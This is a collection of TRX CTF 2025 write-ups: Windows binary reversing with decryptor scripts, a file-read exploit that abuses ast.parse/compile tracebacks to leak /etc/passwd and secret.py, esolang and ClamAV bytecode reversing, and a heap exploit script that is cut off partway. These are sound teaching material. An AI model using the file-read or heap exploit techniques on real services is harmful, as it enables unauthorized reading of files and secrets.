info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Challenge Description

yes, I play lego games while listening to music in my free time

Molly Overview

We are presented with two PE x86_64 binaries: molly.exe and molly_dll.dll

Initially, disassembling molly.exe reveals a multitude of unusual instructions. Furthermore, the high entropy in the .text section suggests that the code is not standard executable code.

At this point running molly.exe produces the following output: (binary is safe, you can also check VirusTotal)

@@@@@@@@@@@@@@@@@@@ , @@@@@@@@@@@@@@@@@@
@@@@@@@@@@@/  /////////////  /@@@@@@@@@@
@@@@@@@/ //*                 //. /@@@@@@
@@@@@  /       ///////// //      /  @@@@
@@@/ /     // //////////////       / /@@
@@ //    ///////  ////// /          /. @
@/ /    ////// /////*,.              / /
@ /    /////    //////////            /
, /    /////  //////////////          /
@ /    ///// ,//////////////          /
@/ /    ////  //////////             / /
@@ */    //   ////    /////         /, @
@@@/ /       ////     ,////        / /@@
@@@@@  /                *//      / .@@@@
@@@@@@@/  //                 //. /@@@@@@
@@@@@@@@@@@/  /////////////  /@@@@@@@@@@

> SYSTEM VALIDATION IN PROGRESS
> USER MUST INPUT THE VERIFICATION TOKEN molly.exe 
> SYSTEM STATE: STOPPING
> USE WITH CAUTION, NO FAILURES ALLOWED

Note

Upon executing Molly with an incorrect token, the binary becomes corrupted and an additional executable named why.exe is generated.

At this point molly_dll.dll likely plays a critical role in unpacking or decrypting molly.exe, making it the logical starting point for further analysis.

Molly Dynamic Overview

By setting a breakpoint at the entry point of molly.exe using x64dbg and examining the memory regions corresponding to the .text section, we observed that the section is fragmented. Some regions are marked as NO_ACCESS, while others have a fixed size of 0x1000 with READ_EXECUTE permissions. This suggests that molly.exe is not packed; rather, it is decrypted and executed at runtime.

Dll Static Analysis

When the Windows loader calls an imported DLL with an entry point, it executes on the main thread before the process’s own entry point. As a result, the process entry point will not run until all DLL entry points have completed.

Disassembling the dll_main function within molly_dll.dll reveals a call to GetProcAddress for resolving KiUserExceptionDispatcher:

call    qword [rel GetCurrentProcess]
lea     rcx, [rel data_180006c48]  {"ntdll.dll"}
mov     rbx, rax
call    qword [rel GetModuleHandleA]
test    rax, rax
je      0x180002fb3

lea     rdx, [rel data_180006c58]  {"KiUserExceptionDispatcher"}
mov     rcx, rax
call    qword [rel GetProcAddress]
mov     qword [rel KiUserExceptionDispatcher_Add], rax
test    rax, rax
je      0x180002fb3

The resolution of KiUserExceptionDispatcher implies that molly_dll.dll is involved in Windows exception handling, which could be key to its runtime decryption capabilities. Also no standard exception handler appears to be registered… Let’s look deeper

An effective obfuscation technique observed in molly_dll.dll is the inline use of system calls, which “obscures” the actual API functions being utilized:

mov     eax, 0x1c
mov     r10, rcx
syscall
retn     {__return_addr}

After looking for eax, 0x1c syscall signature inside ntdll.dll we can confirm this function is a reimplementation of NtSetInformationProcess

lea     rax, [rel sub_1800030b0]
mov     r9d, 0x10
mov     qword [rsp+0x28 {var_10_1}], rax  {sub_1800030b0}
lea     r8, [rsp+0x20 {infostruct}]
xor     eax, eax  {0x0}
mov     edx, 0x28
mov     rcx, rbx
mov     qword [rsp+0x20 {infostruct}], rax  {0x0}
call    NtSetInformationProcess

NtSetInformationProcess is invoked with the undocumented PROCESSINFOCLASS value 0x28, which is responsible for setting an InstrumentationCallback in the process structure.

The function sub_1800030b0 acts as this callback, being invoked during a kernel-mode to user-mode transition with a special register r15 that points to the target user-mode function.

ic_hook:
push    r10 {var_8_1}
push    rax {var_10}
pushfq   {var_18}
push    rbx {__saved_rbx}
mov     rbx, rsp {__saved_rbx}
lea     rax, [rel ic_hook_handler]
cmp     rcx, rax
cmove   rcx, r10
lea     r10, [rsp-0xc0 {var_e0}]
and     r10 {var_e0}, 0xfffffffffffffff0
mov     rsp, r10
cld
sub     rsp, 0x60
mov     qword [rsp {var_140}], rcx
mov     qword [rsp+0x8 {__saved_rdx}], rdx
mov     qword [rsp+0x10 {__saved_rdi}], rdi
mov     qword [rsp+0x18 {__saved_rsi}], rsi
mov     qword [rsp+0x20 {__saved_r8}], r8
mov     qword [rsp+0x28 {__saved_r9}], r9
mov     qword [rsp+0x30 {__saved_r11}], r11
mov     qword [rsp+0x38 {__saved_r12}], r12
mov     qword [rsp+0x40 {__saved_r13}], r13
mov     qword [rsp+0x48 {__saved_r14}], r14
mov     qword [rsp+0x50 {__saved_r15}], r15
sub     rsp, 0x60
movaps  xmmword [rsp {__saved_zmm0}], xmm0
movaps  xmmword [rsp+0x10 {__saved_zmm1}], xmm1
movaps  xmmword [rsp+0x20 {__saved_zmm2}], xmm2
movaps  xmmword [rsp+0x30 {__saved_zmm3}], xmm3
movaps  xmmword [rsp+0x40 {__saved_zmm4}], xmm4
movaps  xmmword [rsp+0x50 {__saved_zmm5}], xmm5
mov     rdx, qword [rbx+0x10 {var_10}]
mov     rcx, qword [rbx+0x18 {var_8_1}]
call    ic_hook_handler
mov     qword [rbx+0x18 {var_8}], rax
movaps  xmm0, xmmword [rsp {__saved_zmm0}]
movaps  xmm1, xmmword [rsp+0x10 {__saved_zmm1}]
movaps  xmm2, xmmword [rsp+0x20 {__saved_zmm2}]
movaps  xmm3, xmmword [rsp+0x30 {__saved_zmm3}]
movaps  xmm4, xmmword [rsp+0x40 {__saved_zmm4}]
movaps  xmm5, xmmword [rsp+0x50 {__saved_zmm5}]
add     rsp, 0x60
mov     rcx, qword [rsp {var_140}]
mov     rdx, qword [rsp+0x8 {__saved_rdx}]
mov     rdi, qword [rsp+0x10 {__saved_rdi}]
mov     rsi, qword [rsp+0x18 {__saved_rsi}]
mov     r8, qword [rsp+0x20 {__saved_r8}]
mov     r9, qword [rsp+0x28 {__saved_r9}]
mov     r11, qword [rsp+0x30 {__saved_r11}]
mov     r12, qword [rsp+0x38 {__saved_r12}]
mov     r13, qword [rsp+0x40 {__saved_r13}]
mov     r14, qword [rsp+0x48 {__saved_r14}]
mov     r15, qword [rsp+0x50 {__saved_r15}]
add     rsp, 0x60
mov     rsp, rbx
pop     rbx {__saved_rbx}
popfq
pop     rax {var_10}
pop     r10 {var_8}
jmp     r10

The function in the middle is responsible for setting the return address. Basically, the argument it receives is the original return address and it compares it against one specific target function (KiUserExceptionDispatcher), if the addresses match up, then it returns a new hook otherwise it returns the argument passed.

ki_user_exp_stub

cld
lea     rcx, [rsp+0x4f0 {exp_record}]
mov     rdx, rsp {__return_addr}
call    ki_user_exp_hook
test    rax, rax
je      0x1800031c0

jmp     rax

cld
mov     rcx, rsp {__return_addr}
mov     rdx, 0x0
call    RtlRestoreContext  {ic_hook_handler}

ki_user_exp_hook

if (exp_record->ExceptionCode == STATUS_ACCESS_VIOLATION && exp_record->ExceptionAddress)
{
    uintptr_t page_base = exp_record->ExceptionInformation[1] & 0xfffffffffffff000;

    if (sub_180004110(&page_guard, page_base))
    {
        if (_Mtx_lock(&encryption_mutex))
        {
            std::_Throw_Cpp_error(5);
            /* no return */
        }

        if (data_18000a05c == 0x7fffffff)
        {
            data_18000a05c = 0x7ffffffe;
            std::_Throw_Cpp_error(6);
            /* no return */
        }

        sub_180003bd0(&page_guard, page_base);
        sub_180003de0(&page_guard);
        int64_t result = _Mtx_unlock(&encryption_mutex);
        exp_record->ExceptionCode = 0;
        exp_record->ExceptionFlags = 0;
        exp_record->ExceptionAddress = 0;
        exp_record->NumberParameters = 0;
        context->EFlags = 0xfe;
        return result;  // return 0
    }
}

return KiUserExceptionDispatcher_Add;

It is evident that ki_user_exp_hook handles STATUS_ACCESS_VIOLATION exceptions caused by attempts to access NO_ACCESS pages, allowing sub_180003bd0 to decrypt it. Once a guarded page is successfully decrypted, ki_user_exp_stub checks the return value from ki_user_exp_hook. If the value is 0, it calls RtlRestoreContext to restore the execution state, allowing the binary to continue execution.

sub_180004110 check if the page is a guarded_page
sub_180003de0 is responsible to re-encrypts old pages, making runtime dumping “ineffective”

Binary Static Decryptor

Now let’s look inside sub_180003bd0:

void* decrypt_page(int32_t* arg1, uintptr_t page_base)

{
    page_base_1 = page_base;
    void* result = sub_1800035f0(arg1, &page_base_1);

    if (result)
    {
        int64_t r8_16 = (((((((((((((((uint64_t)page_base ^ 0xcbf29ce484222325) * 0x100000001b3) ^ (uint64_t)(uint8_t)(page_base >> 8)) * 0x100000001b3) ^ (uint64_t)(uint8_t)(page_base >> 0x10)) * 0x100000001b3) ^ (uint64_t)(uint8_t)(page_base >> 0x18)) * 0x100000001b3) ^ (uint64_t)(uint8_t)(page_base >> 0x20)) * 0x100000001b3) ^ (uint64_t)(uint8_t)(page_base >> 0x28)) * 0x100000001b3) ^ (uint64_t)(uint8_t)(page_base >> 0x30)) * 0x100000001b3) ^ page_base >> 0x38;
        int64_t* rcx_9 = ((*(uint64_t*)((char*)arg1 + 0x30) & (r8_16 * 0x100000001b3)) << 4) + *(uint64_t*)((char*)arg1 + 0x18);
        result = rcx_9[1];

        if (result == *(uint64_t*)((char*)arg1 + 8))
        {
            label_180003dcb:
            std::_Xout_of_range("invalid unordered_map key");
            /* no return */
        }

        while (page_base != *(uint64_t*)((char*)result + 0x10))
        {
            if (result == *(uint64_t*)rcx_9)
                goto label_180003dcb;

            result = *(uint64_t*)((char*)result + 8);
        }

        if (*(uint8_t*)((char*)result + 0x18))
        {
            flNewProtect = 0x1000;
            dwSize = page_base;
            void* var_38_1 = &arg_8;
            VirtualProtect(GetCurrentProcess(), &dwSize, &flNewProtect, 4);
            uintptr_t page_base_2 = page_base;
            int64_t r10_1 = 0;
            int64_t i_1 = 0x1000;
            int64_t i;

            do
            {
                uint8_t rax_15 = *(uint8_t*)page_base_2;
                page_base_2 += 1;
                int64_t rcx_12 = r10_1;
                uint8_t rotated_nibble = rax_15 >> 4 | rax_15 << 4;
                int64_t rax_16;
                int64_t rdx_2;
                rdx_2 = HIGHQ(-0x7777777777777777 * r10_1);
                rax_16 = LOWQ(-0x7777777777777777 * r10_1);
                *(uint8_t*)(page_base_2 - 1) = rotated_nibble;
                r10_1 += 1;
                *(uint8_t*)(page_base_2 - 1) = rotated_nibble ^ page_guard_key[rcx_12 - (rdx_2 >> 3) * 0xf];
                i = i_1;
                i_1 -= 1;
            } while (i != 1);
            flNewProtect = 0x1000;
            dwSize = page_base;
            void* var_38_2 = &arg_8;
            VirtualProtect(GetCurrentProcess(), &dwSize, &flNewProtect, 0x20);
            return set_page_flag(arg1, page_base, false);
        }
    }

    return result;
}

MollyDll decryption routine is quite simple, it first xor using a known key and then rotate the byte nibbles.

We can write a simple python script that decrypt molly.exe .text section:

import sys
import pefile

key = [0x66,0x6f,0x72,0x67,0x69,0x76,0x65,0x6d,0x65,0x66,0x61,0x74,0x68,0x65,0x72]
def invert_nibbles(b):
    return (b & 0xf0) >> 4 | (b & 0x0f) << 4

def main():
    if len(sys.argv) != 2:
        sys.exit(1)

    pe_path = sys.argv[1]

    try:
        pe = pefile.PE(pe_path)
    except Exception as e:
        sys.exit(1)

    text_section = None
    for section in pe.sections:
        if b'.text' in section.Name:
            text_section = section
            break

    if text_section is None:
        sys.exit(2)

    data = bytearray(text_section.get_data())
    pages = text_section.SizeOfRawData // 0x1000

    for i in range(pages):
        offset = i * 0x1000
        for j in range(0x1000):
            data[offset + j] = invert_nibbles(data[offset + j])
            data[offset + j] ^= key[j % len(key)]

    pe.set_bytes_at_offset(text_section.PointerToRawData, bytes(data))
    pe.write('molly_dec.exe')

if __name__ == "__main__":
    main()

Binary Dynamic Decryption (Bonus)

One interesting feature of Molly is its ability to re-encrypt old unlocked pages once the maximum number of decrypted pages has been reached. However, due to the binary’s size and an incorrectly set limit of 0x10, Molly allowed 15 pages to remain decrypted, and no re-encryption occurs after the binary exits.

How can we exploit this behavior?

First, configure x64dbg to establish breakpoints prior to Molly’s start and before its termination, and disable the general exception breakpoint.

After running Molly, the console should close while the process remains active. Next, open Scylla to dump the process.

Even if the binary is not fully decrypted, we can still analyze its core components to reconstruct the flag.

Binary Analysis

Upon examining the main function, it becomes clear that Molly compiles and executes a Lua script containing custom functions: epic_gaming1, epic_gaming2, and epic_gaming3; and subsequently defines a global variable flag with the input provided when running the binary.

Beautified molly script:

local function a(b)
    local c = {}
    b = b:sub(5, -2)
    for d in string.gmatch(b, "[^_]+") do
        table.insert(c, d)
    end
    return c
end
local function e(f)
    if #f ~= 4 then
        return 1
    end
    local g = 100 + 89 - (84 - 608 / ((945 + 12 + 92 + 65 - 31) / 57) - 23) - 60
    local h = 2370000 / (12 + 93 - 95 / (646 / (85 - 3468 / 68))) / 100 - 52 - 63 - 71
    local i = 149 - (-15 + 8800 / (6248 / (125 - (104 - (17502 / (72 / 12) + 93) / 35 + 36))))
    local j = (52808 / (31 - 1800 / (51 - (95 - 448448 / (147 - 83) / 91) + 42)) - 20) / 66
    if string.char(g, h, i, j) ~= f then
        return 1
    end
    return 0
end
local k = a(flag) -- split content inside {} by _
local l = epic_gaming2(k[1]) -- run first part check (c side)
l = l + e(k[2]) -- run second part check (lua side)
l = l + epic_gaming3(k[3]) -- run third part check (c side)
l = l + epic_gaming1(k[4]) -- run fourth part check (c side)
return l

epic_gaming2

# epic_gaming2 solve
xored = b"\xe8\x9d\x8e\x8b\xbc\xd4\x8d"
key = [ 0xDE, 0xAD, 0xBE, 0xEF ]

part1 = [ xored[i] ^ key[i % len(key)] for i in range(len(xored)) ]

print(''.join([chr(c) for c in part1])) # 600dby3

__int64 __fastcall epic_gaming2(__int64 a1)
{
  // ...
  if ( v3 == 7 )
  {
    *(_DWORD *)v10 = 0xEFBEADDE;
    *(_QWORD *)v11 = 0x8DD4BC8B8E9DE8LL;
    v4 = v11;
    v5 = 0;
    v6 = v2 - (_QWORD)v11;
    while ( 1 )
    {
      v7 = v4[v6];
      *v4 ^= v10[v5 & 3];
// ...
  return 1LL;
}

600dby3

epic_gaming_lua

local g = 100 + 89 - (84 - 608 / ((945 + 12 + 92 + 65 - 31) / 57) - 23) - 60
local h = 2370000 / (12 + 93 - 95 / (646 / (85 - 3468 / 68))) / 100 - 52 - 63 - 71
local i = 149 - (-15 + 8800 / (6248 / (125 - (104 - (17502 / (72 / 12) + 93) / 35 + 36))))
local j = (52808 / (31 - 1800 / (51 - (95 - 448448 / (147 - 83) / 91) + 42)) - 20) / 66
print(string.char(g, h, i, j))

d3@r

epic_gaming3

&& ((unsigned __int16)v2[1] | (unsigned __int16)(*v2 << 8)) == COERCE_INT('0p')
    && ((unsigned __int16)v2[3] | (unsigned __int16)(v2[2] << 8)) == COERCE_INT('3n')
    && ((unsigned __int16)v2[5] | (unsigned __int16)(v2[4] << 8)) == COERCE_INT('50')
    && ((unsigned __int16)v2[7] | (unsigned __int16)(v2[6] << 8)) == COERCE_INT('ur')
    && ((unsigned __int16)v2[9] | (unsigned __int16)(v2[8] << 8)) == COERCE_INT('c3') )

0p3n50urc3

epic_gaming1

text = "0n0_d@y_w3_w1ll_m33t"
text += " " * (44 - len(text))
part2_c = [0, 182, 260, 429, 796, 680, 1188, 1043, 1560, 1548, 1520, 2618, 1656, 2548, 2604, 2145, 3184, 2346, 2250, 4332, 2600, 2877, 1870, 3174, 3120, 2050, 2080, 4050, 3668, 4089, 3060, 2573, 3456, 2673, 3876, 4270, 4716, 2960, 4180, 4212, 4400, 4141, 6216, 3612]
print(part2_c[:44])
part2 = ""

from string import printable
for i in range(1, 44):
    sum = part2_c[i] / i
    for c in printable:
        if ord(c) + ord(text[i]) == sum:
            part2 += c
            break

# aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1RZc0NLNEt4 => base64 => "https..."
part2 = "a" + part2
print(part2)

aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1RZc0NLNEt4

Final flag is TRX{600dby3_d3@r_0p3n50urc3_aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1RZc0NLNEt4}

Molly Revenge

Due to Molly dynamic dumping approach, Molly Revenge presents a hardened version of Molly, incorporating anti-debug checks, an new encryption/decryption routine, fewer unlocked pages limit, and rigorous flag integrity verification.

Molly Revenge Decryptor

import sys
import pefile
from Crypto.Cipher import ChaCha20

chacha_key = bytes([
    81, 90, 238, 246,
    49, 96, 101, 57,
    154, 226, 109, 170,
    143, 34, 55, 109,
    174, 11, 21, 112,
    250, 101, 27, 136,
    129, 218, 111, 100,
    38, 121, 11, 3
])
chacha_nonce = bytes([0xd0, 0, 0, 0, 0, 0, 0, 0])

def main():
    if len(sys.argv) != 2:
        sys.exit(1)

    pe_path = sys.argv[1]

    try:
        pe = pefile.PE(pe_path)
    except Exception as e:
        sys.exit(1)

    text_section = None
    for section in pe.sections:
        if b'.text' in section.Name:
            text_section = section
            break

    if text_section is None:
        sys.exit(2)

    data = bytearray(text_section.get_data())
    pages = text_section.SizeOfRawData // 0x1000


    for i in range(pages):
        offset = i * 0x1000
        cipher = ChaCha20.new(key=chacha_key, nonce=chacha_nonce) # fancy way to use ChaCha20 since nonce doesn't change
        data[offset:offset + 0x1000] = bytearray(cipher.decrypt(data[offset:offset + 0x1000]))


    pe.set_bytes_at_offset(text_section.PointerToRawData, bytes(data))
    pe.write('molly_revenge_dec.exe')

if __name__ == "__main__":
    main()

Special Notes

Molly reimplements the Byfron Hyperion anti-tamper feature, originally adopted in Roblox, in a simpler CTF-style manner. This explains the fancy descriptions.

[Roblox] Developers,

We know how important anti-cheat and security are for you and the entire Roblox community. At RDC 1,7k, we announced that we’re turning our focus to cheat prevention. To help get us there, we’re thrilled to welcome Byfron, a leader in anti-cheat solutions, to Roblox. Together, we are combining forces to greatly expand Roblox’s anti-cheat capabilities.

Byfron has developed a state-of-the-art anti-cheat solution that is being utilized by some of the world’s largest game publishers. The team is also passionate about competitive gaming and security, so we think they’re going to be a great match for our community. With their deep domain knowledge and security engineering expertise, we will be accelerating our roadmap to build robust anti-cheat and security solutions. This includes client-side and server-side anti-cheat, alt accounts detection, and additional tools for developers to combat cheaters. Integrating Byfron’s technology into the Roblox platform will improve experience security, protect the competitive landscape, and to allow developers to spend more time building their experiences.

We look forward to sharing more in the coming months. In the meantime, please join us in welcoming Byfron to the Roblox community!

TRX CTF 25 - Online Python Editor

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

This is an easy server side challenge

Overview

We’re given a challenge that allows us to edit Python code online. Syntax checks are performed server-side using ast.parse, and the source code is passed by unpacking request.json into the function call. If an exception is thrown, the traceback will be returned to us.

Our goal is to read the content of secret.py

Since the source code is nearly non-existent, the vulnerability clearly lies in how ast.parse is called:

ast.parse(**request.json)

Let’s review the documentation for ast.parse:

parse(
    source,
    filename='',
    mode='exec',
    *,
    type_comments=False,
    feature_version=None,
    optimize=-1
)
    Parse the source into an AST node.
    Equivalent to compile(source, filename, mode, PyCF_ONLY_AST).
    Pass type_comments=True to get back type comments where the syntax allows.

Although we’re not able to execute arbitrary code, there’s something interesting here:

Equivalent to compile(source, filename, mode, PyCF_ONLY_AST)

compile is known to be unsafe if used in a certain way. In fact, we can read files by causing a syntax error. For example:

>>> compile(".", "/etc/passwd", "exec")
Traceback (most recent call last):
  File "", line 1, in 
    compile(".", "/etc/passwd", "exec")
    ~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/etc/passwd", line 1
    root:x:0:0:Super User:/root:/bin/bash
    ^

To read multiple lines, we can add a newline before the dot, like this:

compile("\n.", "/etc/passwd", "exec")

Final exploit

import requests

URL = "http://localhost:3000"

for x in range(32):
    leak_source = "\n"*x + "."
    response = requests.post(f"{URL}/check", json={
        "source": leak_source,
        "filename": "/app/secret.py"
        })
    leak = response.json()["error"].split("\n")[-4].strip()

    if leak == ".":
        break

    print(leak)

TRX CTF 25 - Perfect Bird

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Challenge Description

As a bird soaring through the sky, you seek the perfect language, and then… you find this

Analysis

When we examine the challenge file, we immediately notice that it has a .db3 extension and is quite large. Opening it with a text editor reveals a strange-looking language that initially appears obfuscated. Our first step is to determine what language this is.

Given the .db3 file extension and the challenge description, which mentions the perfect language and emphasizes the word bird, we perform a quick search. This leads us to conclude that the language in question is DreamBerd, an eso-lang.

Static Analysis

After reviewing DreamBerd’s specifics, we realize that there is no way to execute the program directly, so we opt for static analysis instead.

Examining the code, we observe that the variable 42 is used as an index for m. The declaration of m appears at the end of the file (line 34434) as an array of numbers: [205, 242, 231, 208, 235, 150, 5, 14, 162, 115, 134, 81, 118, 138, 49, 16, 54, 142, 80, 102, 139, 35, 127, 83, 52, 106, 200, 185, 153, 203, 34, 66, 62, 12, 7, 166, 34, 81, 250] The next line of the code prints this array, suggesting that myabe represents the flag for the challenge. Upon further analysis, we see that the rest of the code repeatedly executes the same operation inside an if statement that is always True:

if (;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;42) {
    const var v = m[a-1]!!
    const var w = ((42 ^ v) % 256) ^ 0x89!!!
	m[a-1] = w!!!!
	const var a<-3> = 42 % 39!!
	42 += 1!
}

We simplify this snippet by renaming 42 as i and removing the redundant ! symbols:

const var v = m[a-1]
const var w = ((i ^ v) % 256) ^ 0x89
m[a-1] = w
const var a<-3> = i % 39
i += 1

Rearranging the instructions for better readability and removing unnecessary keywords (const and var), we obtain:

a = i % 39
v = m[a-1]
w = ((i ^ v) % 256) ^ 0x89
m[a-1] = w
i += 1

Since DreamBerd indexes arrays in an unusual way, we account for the -1 offset and rewrite the logic in Python:

index = i % 39
value = m[index]
result = ((i ^ value) % 256) ^ 0x89
m[index] = result
i += 1

Writing the Solve Script

To extract and decode the flag, we implement the following approach:

Read the file, remove ! symbols, and strip unnecessary whitespace:

file = "chall.db3"

with open(file, "r") as f:
	code = f.read().split("\n")
code = [c.strip().replace('!', '') for c in code]

Extract the m array (or copy it directly):

mem = list(map(int, code[-4].split('[')[1][:-1].split(', ')))

Extract the lines containing hardcoded values:

start = 'const var w = '
operations = [c[len(start):] for c in code if c.startswith(start)]

Implement the original code logic:

for i, op in enumerate(operations):
	num = int(op.split(' ^ ')[2], 16)
	addr = i % len(mem)
	mem[addr] = ((i ^ mem[addr]) % 256) ^ num

Cast and print the flag:

flag = bytes(mem).decode()
print(flag)

Final Solve Script

file = "chall.db3"

with open(file, "r") as f:
	code = f.read().split("\n")
code = [c.strip().replace('!', '') for c in code]

mem = list(map(int, code[-4].split('[')[1][:-1].split(', ')))

start = 'const var w = '
operations = [c[len(start):] for c in code if c.startswith(start)]

for i, op in enumerate(operations):
	num = int(op.split(' ^ ')[2], 16)
	addr = i % len(mem)
	mem[addr] = ((i ^ mem[addr]) % 256) ^ num

flag = bytes(mem).decode()
print(flag)

Flag

TRX{tHi5_I5_th3_P3rf3ct_l4nGU4g3!!!!!!}

TRX CTF 25 - RuleMaster

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Description

I am tired of hackers evading my signatures, why don’t you try triggering it for a change?

Solution

The file given for the challenge is a “.cbc” with the magic bytes “ClamBC”, which, with a bit of googling, we can easily find out that is a “ClamAV signature bytecode”.

This is a feature offered by the ClamAV AntiVirus where an analyst can write a logical signature in C, which is then compiled into bytecode and added to the traditional signatures of the antivirus.

The first result of the google search is the (ClamBC)[https://linux.die.net/man/1/clambc] tool, installed with ClamAV, which is essential to the challenge.

The first thing one can try is the comand to extract the source code, which fails:

> clambc -p chall.cbc
Nice_try_but_it_cant_be_this_easy%

This is beacause the bytecode was compiled with a COPYRIGHT header, meaning the source code is not included in the bytecode.

For this reason we have to work with the bytecode which we can extract with the following command:

> clambc -c chall.cbc

Before looking at the bytecode we can check which is the initial signature that triggers the bytecode, which we can see with the following command:

> clambc --info chall.cbc
...
bytecode logical signature: The_RuleGod...{Congrats_You_got_it,It_just_needs_a_little_fixing-come_on,Perfect_form_now_we_just_need_whats_inside,Well_thats_a_start_but_its_not_quite_it_yet,You_read_the_CTF_rules_i_like_that};Engine:56-255,Target:0;0;0:5452587b
...

We can see at the end of the line after “Target” that the rule triggers when the file contains “5452587b”, which is “TRX{”, our flag format.

Now we can start looking at the bytecode, the bytecode is structured in several sections, only two are useful, the constants section and the function section. The function section contains the bytecode we need to reverse, the constants section contains the value of all the costants of the program which are going to be accessed by ID in the bytecode.

The first check is on the last character of the flag which needs to be equal to “}”, and here alreay we can see that “bb.4” is the “FAIL” block so it’s what we need to avoid.

0    1  OP_BC_CALL_API      [33 /168/  3]  3 = seek[3] (1775, 1776) -- constants[1775] = -1, constants[1776] = SEEK_END
0    2  OP_BC_CALL_API      [33 /168/  3]  4 = read[1] (p.1, 1777) -- constants[1777] = 1
0    3  OP_BC_COPY          [34 /171/  1]  cp 1 -> 5
0    4  OP_BC_ICMP_EQ       [21 /106/  1]  6 = (5 == 1778)  -- constants[1778] = "}"
0    5  OP_BC_COPY          [34 /174/  4]  cp 1779 -> 0
0    6  OP_BC_BRANCH        [17 / 85/  0]  br 6 ? bb.1 : bb.4

Next is the check on the size of the flag which is 44:

1    8  OP_BC_ICMP_EQ       [21 /108/  3]  8 = (3 == 1781) -- constants[1781] = 44
1    9  OP_BC_COPY          [34 /174/  4]  cp 1782 -> 0
1   10  OP_BC_BRANCH        [17 / 85/  0]  br 8 ? bb.2 : bb.4

Now after this we see a series of operation on value of the file which follow the following format:

2   20  OP_BC_CALL_API      [33 /168/  3]  18 = seek[3] (1792, 1793)
2   21  OP_BC_CALL_API      [33 /168/  3]  19 = read[1] (p.1, 1794)
2   22  OP_BC_COPY          [34 /171/  1]  cp 1 -> 20
2   23  OP_BC_AND           [11 / 56/  1]  21 = 20 & 1795
2   24  OP_BC_ICMP_NE       [22 /111/  1]  22 = (21 != 1796)

which is equal to:

seek(X, SEEK_SET/SEEK_END)
read(buf, 1)
check = (buf & Y) == Z

with the value of X,Y and Z all contained in the constants section.

Or:

2  1363  OP_BC_CALL_API      [33 /168/  3]  1361 = seek[3] (3135, 3136)
2  1364  OP_BC_CALL_API      [33 /168/  3]  1362 = read[1] (p.1, 3137)
2  1365  OP_BC_COPY          [34 /171/  1]  cp 1 -> 1363
2  1366  OP_BC_ICMP_UGT      [23 /116/  1]  1364 = (1363 > 3138)

which is equal to:

seek(X, SEEK_SET/SEEK_END)
read(buf, 1)
check = (buf > Y)

And if we scroll all the way to the bottom, we can there the check is performed:

...
2  1759  OP_BC_SELECT        [31 /155/  0]  1757 = 1756 ? 3531 : 71)
2  1760  OP_BC_SELECT        [31 /155/  0]  1758 = 1757 ? 3532 : 67)
2  1761  OP_BC_SELECT        [31 /155/  0]  1759 = 1758 ? 3533 : 63)
2  1762  OP_BC_SELECT        [31 /155/  0]  1760 = 1759 ? 3534 : 59)
2  1763  OP_BC_SELECT        [31 /155/  0]  1761 = 1760 ? 3535 : 54)
2  1764  OP_BC_SELECT        [31 /155/  0]  1762 = 1761 ? 3536 : 50)
2  1765  OP_BC_SELECT        [31 /155/  0]  1763 = 1762 ? 3537 : 45)
2  1766  OP_BC_SELECT        [31 /155/  0]  1764 = 1763 ? 3538 : 41)
2  1767  OP_BC_SELECT        [31 /155/  0]  1765 = 1764 ? 3539 : 36)
2  1768  OP_BC_SELECT        [31 /155/  0]  1766 = 1765 ? 3540 : 31)
2  1769  OP_BC_SELECT        [31 /155/  0]  1767 = 1766 ? 3541 : 27)
2  1770  OP_BC_SELECT        [31 /155/  0]  1768 = 1767 ? 3542 : 22)
2  1771  OP_BC_SELECT        [31 /155/  0]  1769 = 1768 ? 3543 : 17)
2  1772  OP_BC_SELECT        [31 /155/  0]  1770 = 1769 ? 3544 : 1461)
2  1773  OP_BC_COPY          [34 /174/  4]  cp 3545 -> 0
2  1774  OP_BC_BRANCH        [17 / 85/  0]  br 1770 ? bb.4 : bb.3

which is just an efficient way of making sure that all the checks are equal to 0. Meaning that all the conditions above need to be False.

After noticing this we just need to write a parser that extracts all the conditions and passes then to z3 which is what i have done in the “solve.py” script.

Fun Fact: The AND contitions are by themselfs almost enough to get the flag, except for one character which is incorrectly capitalized, after adding the LESS condition the solution becomes correct.

TRX CTF 25 - TRX Bank

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Description

To all our Valued Customers, at TRX Bank we aim to provide only the top-notch banking and customer experience;
all reports about so-called “data leaks” are baseless slander from our competitors.

DISCLAIMER: Please test your solve locally before spawning a remote instance of the challenge!

Overview of the challenge

The challenge allows us to create/delete bank accounts and make transfers/deposits, there’s also a secret_backdoor function, which we can access only after successfully leaking pie, which allows us to overwrite part of the fp_rand file struct used to create random IBANs

Solution

The first step to solving the challenge is noticing a missing check in the transfer function, we can make the scanf call that asks the transfer amount fail, allowing us to use the uninitialized variable as an oracle, we can then binary search that value against our account balance.
This allows us to leak pie/heap/libc/stack by making the binary reach different functions before transferring (see solve.py for details)

The second step involves overwriting the prev_chain and chain fields of the file struct, allowing us to perform an unsafe-unlink to gain a limited write-what primitive, the catch is that both the write and the what must be writeable addresses
One possible solution is to overwrite a saved rbp on the stack and pivot to a controlled location.

The last thing we need is a place to store our rop-chain, i opted for writing it to the heap by overwriting the _fileno to stdin and creating new IBANs

Solve Script

#!/usr/bin/env python3

from pwn import *
from time import sleep

exe = ELF("./chal_patched")
libc = ELF("./libc.so.6")

context.binary = exe

DOCKER_PORT = 3317
REMOTE_NC_CMD    = "nc bank.ctf.theromanxpl0.it 7010"    # `nc  `

bstr = lambda x: str(x).encode()
ELF.binsh = lambda self: next(self.search(b"/bin/sh\0"))

GDB_SCRIPT = """
set follow-fork-mode parent
set follow-exec-mode same
b *transfer+334
"""

def conn():
    if args.LOCAL:
        return process([exe.path])
    if args.GDB:
        return gdb.debug([exe.path], gdbscript=GDB_SCRIPT)
    if args.DOCKER:
        return remote("localhost", DOCKER_PORT)
    return remote(REMOTE_NC_CMD.split()[1], int(REMOTE_NC_CMD.split()[2]))

def main():
    r = conn()

    def malloc():
        r.sendline(b"2")
